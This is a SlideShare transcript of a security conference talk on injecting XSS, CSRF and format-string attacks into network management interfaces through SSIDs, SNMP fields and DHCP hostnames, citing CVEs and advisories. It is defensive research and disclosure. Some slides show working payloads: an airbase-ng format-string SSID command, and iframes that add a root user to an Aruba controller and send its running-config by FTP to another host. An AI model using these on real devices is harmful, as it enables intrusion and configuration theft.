SlideShare a Scribd company logo
It’s All In The Name
Introduction
Deral Heiland
Rapid7 Research Lead “IoT”
•  25+ years of experience in the Information Technology,
15 of that in Security and last 8+ year security
researcher, penetration tester and consulting for
corporations and government agencies
deral_heiland@rapid7.com
@Percent_X
Agenda
•  Why
•  Web technology
•  Web security and lack there of
•  Injection attack using commonly overlooked methods
•  A few examples
•  Conclusion
•  Questions
Why
•  Search for simple and obvious attacks vectors
•  Machine to machine exchange of data
•  The simple is so often overlooked
Web Technology
•  Embedded
•  Appliance
•  IoT
•  Management software
•  Network
•  Security
•  Device (printers)
Acme.Serve/v1.7 of 13nov96
ACS 5.5
Allegro-Software-RomPager/1.52
Allegro-Software-RomPager/ 2.10
Allegro-Software-RomPager/4.10
Allegro-Software-RomPager/4.34
Apache
Apache/2.2.15 (CentOS)
Apache/2.2.15 (Red Hat)
Apache/2.2.17 (Unix)
Apache/2.2.29 (Unix)
Apache/2.2.31 (FreeBSD)A
Apache/2.2.3 (CentOS)
Apache/2.4.12 (Unix)
Apache-Coyote/1.1
AvigilonOnvifNvt/2.2.0.14
AvigilonOnvifNvt/2.6.0.4
Avocent DSView 3/3.7.1.27
Brivo ACS OnSite
Cherokee/1.2.101 (UNIX)
Cougar/9.6.7100.0
DVRDVS-Webs
EWS-NIC4/11.68
GoAhead-Webs
gSOAP/2.8
Happy ICS Server
Hiawatha v5.7
HP-ChaiServer/3.0
HP-ChaiSOE/1.0
HP_Compact_Server
HTTP/1.0
HTTP/1.1
IBM_HTTP_Server
IBM_HTTP_SERVER/1.3.28 Apache/1.3.28
(Win32)
Jetty/5.1.10 (Linux/2.6.11gum arm java/1.3.1
subset
Jetty/5.1.10 (Linux/2.6.21gum arm java/1.4.2
subset
Jetty(6.1.5)
Jetty(8.y.z-SNAPSHOT)
Jetty(9.1.1.v20140108)
Jetty(9.1.5.v20140505)
Jetty(9.2.z-SNAPSHOT)
lighttpd/1.4.11
lighttpd/1.4.13
lighttpd/1.4.23-devel-2760
lighttpd/1.4.23-devel-3200
lighttpd/1.4.25-devel-7739
lighttpd/1.4.32
lighttpd/1.4.35
Linux/3.0.1+, UPnP/1.0
Mbedthis-Appweb/2.4.2
Microplex emHTTPD/1.0
Microsoft-HTTPAPI/2.0
Microsoft-IIS/10.0
Microsoft-IIS/6.0
Microsoft-IIS/7.0
Microsoft-IIS/7.5
Microsoft-IIS/8.0
Microsoft-IIS/8.5
Microsoft-WinCE/7.00
Mono.WebServer2/0.4.0.0 Win32NT
nginx/1.2.3
nginx/1.4.6 (Ubuntu)
Niagara Web Server/3.5.34
Niagara Web Server/3.7.106.12
PanWeb Server/ -
PasteWSGIServer/0.5 Python/2.6.6
RapidLogic/1.1
SecureTransport 5.3.1
thttpd/2.25b
ulwsd/1.0.1-20140331
Virata-EmWeb/R6_0_1
Virata-EmWeb/R6_2_1
Wireless IP Telephone HTTPd
Web Technology
•  XSS allows Malicious actors to inject client-side
scripts into web pages viewed by other users.
•  Reflective
•  Persistent
•  CSRF causes a user's web browser to perform
an unwanted action.
•  Alter configurations
•  Complete a transaction (IE Banking)
Web security and The lack there of !
•  Format String A format string is an ansi C
specifier that is supplied to a function to tell the
program what the format of the output should
be.
•  Format String Vulnerability Incorrectly written
code that does not define the format string
specifiers. Allowing format strings to be passed
within an applications variable, which leads to
the application evaluating the input as code.
Web security and The lack there of !
•  Filtering input
•  Escaping dangerous characters
•  Use CSRF tokens
•  Conduct regular code reviews
Web security and The lack there of !
•  Directly targeting web app
•  Internet exposed app still often discovered with issues
•  Good AppSec program can help mitigate
•  Application firewalls can help mitigate Internet exposure
•  Off the shelf products and embedded devices still have issues
Web security and The lack there of !
Exploit Delivery
Exploit Delivery
•  Machine to Machine
•  Very often overlooked
•  Great for targeting enterprise
•  Enterprise management solutions
•  Embedded devices
SSID
SSID
•  Service Set Identifier (SSID)
•  Purpose of the SSID is to assign human readable names
to an 802.11 wireless network
•  The SSID is broadcast in a management frame or Beacon
Frame
SSID information element
•  Element ID: This is set to ‘0’ to signal that an SSID is being broadcast
•  Length: Indicates the length of the information field
•  SSID: The human readable station name
SSID
•  No defined restrictions as to what characters can be
used within an SSID (IEEE Std 802.11™-2012)
•  Limited to 32 characters
SSID
•  Not the first time this attack vector was reported
•  Rafael Dominguez Vega of MWR InfoSecurity
•  White paper: Behind Enemy Lines July 2008
•  BT Home Hub
•  DD-WRT
•  My research expanded on this and targeted more
enterprise level solutions
SSID
•  This research work initial disclosed in 2013 Blackhat
Europe
•  Multiple vulnerable products
•  Wifi Pineapple
•  Cisco small business Wifi Wap200 and Wep200
•  SonicWall network security appliance
•  Aruba Wireless LAN Controllers
•  Since then
•  Unnamed Wifi Lan Controller
•  Enterprise IoT automation solution ( Not Released Yet)
SSID
•  Attack vectors identified deliverable via SSID
•  XSS
•  CSRF
•  Format string
SSID
•  Format String Injection
•  Cisco/Linksys WAP200 & WET200
•  Site Survey function: Listens for all APs within range and reports
back their SSID
SSID
•  Setup airbase-ng to broadcast SSID “%x%x%x”
airbase-ng -e “%x%x%x" -c 2 mon0
•  AP survey detected %x%x%x SSID
SSID
• SonicWall Tz210
• Aruba WLC
SSID
•  Aruba commands executed using <IFRAME>
<iframe src=/screens/auth/execAddUser.html?
username=hacker&passwd=Hack3d&role=root&status=>
<iframe src=/screens/cmnutil/execCommandReturnResult.xml?copy
%20running-config%20ftp%20192.168.1.14%20%22anonymous
%22%20%22test%22%20%22running.cfg%22%20%22/incoming
%22@@1357225152747>
SNMP
ISO (1)
ORG (3)
DOD (6)
INTERNET (1)
Directory (1) Management (2) Experimental (3) Private (4)
SNMP
•  Management Information Base (MIB) is a file
that contains definitions of management
information so that networked systems can be
remotely monitored, configured, and controlled.
•  Object Identifier (OIDs) point to individual
network objects that are maintained within a
database called a Management Information
Base
SNMP
•  The OIDs that are the most critical include:
•  1.3.6.1.2.1.1.1.0 sysDesc
•  1.3.6.1.2.1.1.4.0 sysContact
•  1.3.6.1.2.1.1.5.0 sysName
•  1.3.6.1.2.1.1.6.0 sysLocation
SNMP
•  Injection attacks via SNMP data
•  Research project started in Fall 2015
•  Deral Heiland  Matthew Kienow
•  Mainly targeting Network Management Systems
•  Currently 6 published products advisories
•  5 more to be released prior to Defcon Conference
SNMP
• Demo Nexpose
• Demo SNMPc
Hostname
scriptalert('YOUR-PWND')/script
Hostname
•  What application and appliances consume hostname?
•  What is the impact?
•  Do they properly filter and escape data from hostname?
•  CVE-2015-3626, (XSS) vulnerability in the DHCP Monitor page in the
Web User Interface (WebUI) in Fortinet FortiOS before 5.2.4 on FortiGate
devices allows remote attackers to inject arbitrary web script or HTML via
a crafted hostname
•  CVE-2014-4645
•  CVE-2014-4727
•  CVE-2013-3572
Hostname
Hostname
•  I am still collecting data on this
•  Made a request several months back online
•  https://community.rapid7.com/community/infosec/blog/
2016/03/09/it-s-all-in-the-name
•  Check out blog and participate
security@rapid7.com (PGP KeyID: 0x8AD4DB8D)
Questions
Deral Heiland
Rapid7 Research Lead “IoT”
Deral_Heiland@rapid7.com
@Percent_x

More Related Content

What's hot

Fortinet av
Fortinet avFortinet av
Fortinet av
Lan & Wan Solutions
 
From IT to IoT: Bridging the Growing Cybersecurity Divide
From IT to IoT: Bridging the Growing Cybersecurity DivideFrom IT to IoT: Bridging the Growing Cybersecurity Divide
From IT to IoT: Bridging the Growing Cybersecurity Divide
Priyanka Aash
 
Sandboxing
SandboxingSandboxing
Genian NAC Datasheet
Genian NAC Datasheet Genian NAC Datasheet
Genian NAC Datasheet
GENIANS, INC.
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
Chong-Kuan Chen
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
CODE BLUE
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
CanSecWest
 
BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...
BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...
BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...
BlueHat Security Conference
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
AlienVault
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Arash Ramez
 
RSAC 2016: How to Get into ICS Security
RSAC 2016: How to Get into ICS SecurityRSAC 2016: How to Get into ICS Security
RSAC 2016: How to Get into ICS Security
Chris Sistrunk
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
Priyanka Aash
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CanSecWest
 
Application layer Security in IoT: A Survey
Application layer Security in IoT: A SurveyApplication layer Security in IoT: A Survey
Application layer Security in IoT: A Survey
Adeel Ahmed
 
SCADA Security: The Five Stages of Cyber Grief
SCADA Security: The Five Stages of Cyber GriefSCADA Security: The Five Stages of Cyber Grief
SCADA Security: The Five Stages of Cyber Grief
Lancope, Inc.
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat Security Conference
 
Forti cloud
Forti cloudForti cloud
Forti cloud
Lan & Wan Solutions
 
Check Point designing a security
Check Point designing a securityCheck Point designing a security
Check Point designing a security
Group of company MUK
 
ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...
ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...
ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...
Robert Conti Jr.
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
EC-Council
 

What's hot (20)

Fortinet av
Fortinet avFortinet av
Fortinet av
 
From IT to IoT: Bridging the Growing Cybersecurity Divide
From IT to IoT: Bridging the Growing Cybersecurity DivideFrom IT to IoT: Bridging the Growing Cybersecurity Divide
From IT to IoT: Bridging the Growing Cybersecurity Divide
 
Sandboxing
SandboxingSandboxing
Sandboxing
 
Genian NAC Datasheet
Genian NAC Datasheet Genian NAC Datasheet
Genian NAC Datasheet
 
Malware collection and analysis
Malware collection and analysisMalware collection and analysis
Malware collection and analysis
 
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
Threat Analysis on Win10 IoT Core and Recommaended Security Measures by Naohi...
 
CSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application securityCSW2017 chuanda ding_state of windows application security
CSW2017 chuanda ding_state of windows application security
 
BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...
BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...
BlueHat v17 || Extracting Secrets from Silicon – A New Generation of Bug Hunt...
 
Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?Whats New in OSSIM v2.2?
Whats New in OSSIM v2.2?
 
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation APIAnti-tampering in Android and Take Look at Google SafetyNet Attestation API
Anti-tampering in Android and Take Look at Google SafetyNet Attestation API
 
RSAC 2016: How to Get into ICS Security
RSAC 2016: How to Get into ICS SecurityRSAC 2016: How to Get into ICS Security
RSAC 2016: How to Get into ICS Security
 
RIoT (Raiding Internet of Things) by Jacob Holcomb
RIoT  (Raiding Internet of Things)  by Jacob HolcombRIoT  (Raiding Internet of Things)  by Jacob Holcomb
RIoT (Raiding Internet of Things) by Jacob Holcomb
 
CSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on androidCSW2017 Geshev+Miller logic bug hunting in chrome on android
CSW2017 Geshev+Miller logic bug hunting in chrome on android
 
Application layer Security in IoT: A Survey
Application layer Security in IoT: A SurveyApplication layer Security in IoT: A Survey
Application layer Security in IoT: A Survey
 
SCADA Security: The Five Stages of Cyber Grief
SCADA Security: The Five Stages of Cyber GriefSCADA Security: The Five Stages of Cyber Grief
SCADA Security: The Five Stages of Cyber Grief
 
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
BlueHat v18 || Tales from the soc - real-world attacks seen through azure atp...
 
Forti cloud
Forti cloudForti cloud
Forti cloud
 
Check Point designing a security
Check Point designing a securityCheck Point designing a security
Check Point designing a security
 
ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...
ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...
ISS Capstone - Martinez Technology Consulting and Cedar Hills Church Security...
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 

Similar to It’s All In The Name - Deral Heiland

Scada Strangelove - 29c3
Scada Strangelove - 29c3Scada Strangelove - 29c3
Scada Strangelove - 29c3
qqlan
 
Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...
Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...
Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...
MrityunjayaHikkalgut1
 
A modern approach to safeguarding your ICS and SCADA systems
A modern approach to safeguarding your ICS and SCADA systemsA modern approach to safeguarding your ICS and SCADA systems
A modern approach to safeguarding your ICS and SCADA systems
Alane Moran
 
Network Security
Network SecurityNetwork Security
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
Santhosh Kumar
 
WLAN Security
WLAN Security WLAN Security
WLAN Security
Gururaj H L
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
qqlan
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
dotnetcode
 
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays
 
SUGCON EU 2023 - Secure Composable SaaS.pptx
SUGCON EU 2023 - Secure Composable SaaS.pptxSUGCON EU 2023 - Secure Composable SaaS.pptx
SUGCON EU 2023 - Secure Composable SaaS.pptx
Vasiliy Fomichev
 
Practical advice for cloud data protection ulf mattsson - jun 2014
Practical advice for cloud data protection   ulf mattsson - jun 2014Practical advice for cloud data protection   ulf mattsson - jun 2014
Practical advice for cloud data protection ulf mattsson - jun 2014
Ulf Mattsson
 
Nozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-SheetNozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and Data
Precisely
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
Xavier Ashe
 
Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...
Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...
Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...
NetworkCollaborators
 
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESCENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
Nazmul Hossain Rakib
 
Removing Security Roadblocks to IoT Deployment Success
Removing Security Roadblocks to IoT Deployment SuccessRemoving Security Roadblocks to IoT Deployment Success
Removing Security Roadblocks to IoT Deployment Success
Microsoft Tech Community
 
PT-DTS SCADA Security using MaxPatrol
PT-DTS SCADA Security using MaxPatrolPT-DTS SCADA Security using MaxPatrol
PT-DTS SCADA Security using MaxPatrol
Shah Sheikh
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 

Similar to It’s All In The Name - Deral Heiland (20)

Scada Strangelove - 29c3
Scada Strangelove - 29c3Scada Strangelove - 29c3
Scada Strangelove - 29c3
 
Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...
Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...
Cyber Crime / Cyber Secuity Testing Architecture by MRITYUNJAYA HIKKALGUTTI (...
 
A modern approach to safeguarding your ICS and SCADA systems
A modern approach to safeguarding your ICS and SCADA systemsA modern approach to safeguarding your ICS and SCADA systems
A modern approach to safeguarding your ICS and SCADA systems
 
Network Security
Network SecurityNetwork Security
Network Security
 
Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016Lateral Movement - Phreaknik 2016
Lateral Movement - Phreaknik 2016
 
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
 
WLAN Security
WLAN Security WLAN Security
WLAN Security
 
Positive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-raysPositive Technologies - S4 - Scada under x-rays
Positive Technologies - S4 - Scada under x-rays
 
Meetup DotNetCode Owasp
Meetup DotNetCode Owasp Meetup DotNetCode Owasp
Meetup DotNetCode Owasp
 
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
apidays LIVE Paris - Serverless security: how to protect what you don't see? ...
 
SUGCON EU 2023 - Secure Composable SaaS.pptx
SUGCON EU 2023 - Secure Composable SaaS.pptxSUGCON EU 2023 - Secure Composable SaaS.pptx
SUGCON EU 2023 - Secure Composable SaaS.pptx
 
Practical advice for cloud data protection ulf mattsson - jun 2014
Practical advice for cloud data protection   ulf mattsson - jun 2014Practical advice for cloud data protection   ulf mattsson - jun 2014
Practical advice for cloud data protection ulf mattsson - jun 2014
 
Nozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-SheetNozomi Networks SCADAguardian - Data-Sheet
Nozomi Networks SCADAguardian - Data-Sheet
 
Controlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and DataControlling Access to IBM i Systems and Data
Controlling Access to IBM i Systems and Data
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...
Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...
Cisco Connect 2018 Thailand - Secure data center building a secure zero trust...
 
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICESCENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
CENTRAL MANAGEMENT OF NETWORK AND CALL SERVICES
 
Removing Security Roadblocks to IoT Deployment Success
Removing Security Roadblocks to IoT Deployment SuccessRemoving Security Roadblocks to IoT Deployment Success
Removing Security Roadblocks to IoT Deployment Success
 
PT-DTS SCADA Security using MaxPatrol
PT-DTS SCADA Security using MaxPatrolPT-DTS SCADA Security using MaxPatrol
PT-DTS SCADA Security using MaxPatrol
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015   sebaSolvay secure application layer v2015   seba
Solvay secure application layer v2015 seba
 

More from EC-Council

CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldCyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
EC-Council
 
Cloud Security Architecture - a different approach
Cloud Security Architecture - a different approachCloud Security Architecture - a different approach
Cloud Security Architecture - a different approach
EC-Council
 
Phases of Incident Response
Phases of Incident ResponsePhases of Incident Response
Phases of Incident Response
EC-Council
 
Weaponizing OSINT – Hacker Halted 2019 – Michael James
 Weaponizing OSINT – Hacker Halted 2019 – Michael James  Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James
EC-Council
 
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith TurpinHacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
EC-Council
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
EC-Council
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
EC-Council
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
EC-Council
 
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoData in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
EC-Council
 
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderBreaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
EC-Council
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian HilemanAre your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
EC-Council
 
War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019War Game: Ransomware – Global CISO Forum 2019
War Game: Ransomware – Global CISO Forum 2019
EC-Council
 
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
How to become a Security Behavior Alchemist – Global CISO Forum 2019 – Perry ...
EC-Council
 
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019  –  Donna Gall...Introduction to FAIR Risk Methodology – Global CISO Forum 2019  –  Donna Gall...
Introduction to FAIR Risk Methodology – Global CISO Forum 2019 – Donna Gall...
EC-Council
 
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes WidnerAlexa is a snitch! Hacker Halted 2019 - Wes Widner
Alexa is a snitch! Hacker Halted 2019 - Wes Widner
EC-Council
 
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law EnforcementHacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
Hacker Halted 2018: Don't Panic! Big Data Analytics vs. Law Enforcement
EC-Council
 
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
Hacker Halted 2018: HACKING TRILLIAN: A 42-STEP SOLUTION TO EXPLOIT POST-VOGA...
EC-Council
 
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
Hacker Halted 2018: Breaking the Bad News: How to Prevent Your IR Messages fr...
EC-Council
 
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
Hacker Halted 2018: From CTF to CVE – How Application of Concepts and Persist...
EC-Council
 
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
Hacker Halted 2018: SE vs Predator: Using Social Engineering in ways I never ...
EC-Council
 

More from EC-Council (20)

CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber WorldCyberOm - Hacking the Wellness Code in a Chaotic Cyber World
CyberOm - Hacking the Wellness Code in a Chaotic Cyber World
 
Cloud Security Architecture - a different approach
Cloud Security Architecture - a different approachCloud Security Architecture - a different approach
Cloud Security Architecture - a different approach
 
Phases of Incident Response
Phases of Incident ResponsePhases of Incident Response
Phases of Incident Response
 
Weaponizing OSINT – Hacker Halted 2019 – Michael James
 Weaponizing OSINT – Hacker Halted 2019 – Michael James  Weaponizing OSINT – Hacker Halted 2019 – Michael James
Weaponizing OSINT – Hacker Halted 2019 – Michael James
 
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith TurpinHacking Your Career – Hacker Halted 2019 – Keith Turpin
Hacking Your Career – Hacker Halted 2019 – Keith Turpin
 
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle LeeHacking Diversity – Hacker Halted . 2019 – Marcelle Lee
Hacking Diversity – Hacker Halted . 2019 – Marcelle Lee
 
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff SilverCloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
Cloud Proxy Technology – Hacker Halted 2019 – Jeff Silver
 
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
DNS – Strategies for Reducing Data Leakage & Protecting Online Privacy – Hack...
 
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea AmicoData in cars can be creepy – Hacker Halted 2019 – Andrea Amico
Data in cars can be creepy – Hacker Halted 2019 – Andrea Amico
 
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel NaderBreaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
Breaking Smart [Bank] Statements – Hacker Halted 2019 – Manuel Nader
 
Are your cloud servers under attack?– Hacker Halted 2019 – Brian Hileman
